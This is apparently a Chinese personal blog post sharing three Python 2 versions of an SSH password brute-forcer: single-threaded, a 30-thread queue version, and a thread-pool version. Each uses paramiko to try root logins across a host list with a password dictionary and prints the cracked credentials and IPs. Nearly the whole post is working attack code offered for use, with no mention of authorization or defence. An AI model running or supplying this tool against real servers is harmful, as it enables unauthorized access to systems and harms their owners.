ssh爆破脚本
前些天,基友发我一个ssh爆破工具,看起来很吊的样子。然后我闲着无聊,就自己写了个py脚本。
单线程:慢成狗-----
#coding:utf-8 #author:jwong import threading import os import time import paramiko import sys import Queue import socket BASE_DIR = os.path.dirname(os.path.abspath(__file__)) def ssh_connect(host,pwd): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(hostname=host,port=22,username='root',password=pwd,timeout=5) ssh.close() print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host) except paramiko.AuthenticationException,e: pass except socket.error,e: pass # class ClassName(object): # """docstring for ClassName""" # def __init__(self, arg): # super(ClassName, self).__init__() # self.arg = arg # host_file = BASE_DIR + '\dict\hosts.txt' pass_file = BASE_DIR + '\dict\pass.txt' def open_file(path): host = [] with open(path,'r') as f: for line in f.readlines(): if line.strip('\n') == '': continue host.append(line.strip('\n')) return host hosts = open_file(host_file) password = open_file(pass_file) for host in hosts: for pass12 in password: print host ssh_connect(host,pass12)
运行时会出现提示:No handlers could be found for logger "paramiko.transport"。这只是 Python logging 没有配置 handler 时的警告,并不是连接本身出错;下面多线程版本里用 paramiko.util.log_to_file 指定了日志文件来处理。参考:http://stackoverflow.com/questions/19152578/no-handlers-could-be-found-for-logger-paramiko
多线程版本:
#coding:utf-8 import threading import Queue import paramiko import socket import os BASE_DIR = os.path.dirname(os.path.abspath(__file__)) host_file = BASE_DIR + '\dict\hosts.txt' pass_file = BASE_DIR + '\dict\pass.txt' paramiko.util.log_to_file("filename.log") queue = Queue.Queue() lock = threading.Lock() def read_host_file(path): hostlist = [] with open(path,'r') as f: for line in f.readlines(): if line == '': continue line = socket.gethostbyname(line.strip()) hostlist.append(line) return hostlist def read_pass_file(path): passlist = [] with open(path,'r') as f: for line in f.readlines(): if line == '': continue passlist.append(line.strip()) return passlist class SSH(threading.Thread): """docstring for SSH""" def __init__(self,queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: # if self.queue.empty(): # break host,pwd = self.queue.get() try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname=host,port=22,username='root',password=pwd,timeout=5) ssh.close() print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host) except paramiko.AuthenticationException,e: pass except socket.error,e: pass except: pass self.queue.task_done() if __name__ == '__main__': hosts = read_host_file(host_file) passlist = read_pass_file(pass_file) for i in range(30): fuck_ssh = SSH(queue) fuck_ssh.setDaemon(True) fuck_ssh.start() for host in hosts: for pwd in passlist: queue.put((host,pwd)) queue.join()
另一个模块实现:
#coding:utf-8 from multiprocessing.dummy import Pool as ThreadPool from functools import partial if __name__ == '__main__': hosts = read_host_file(host_file) passlist = read_pass_file(pass_file) for host in hosts: partial_user = partial(ssh_connect,host) pool = ThreadPool(20) pool.map(partial_user,passlist) pool.close() pool.join()
参考文献:
http://www.ibm.com/developerworks/cn/aix/library/au-threadingpython/
http://www.waitalone.cn/python-mysql-mult.html
http://www.waitalone.cn/python-brute-all.html
http://www.waitalone.cn/python-thread-map.html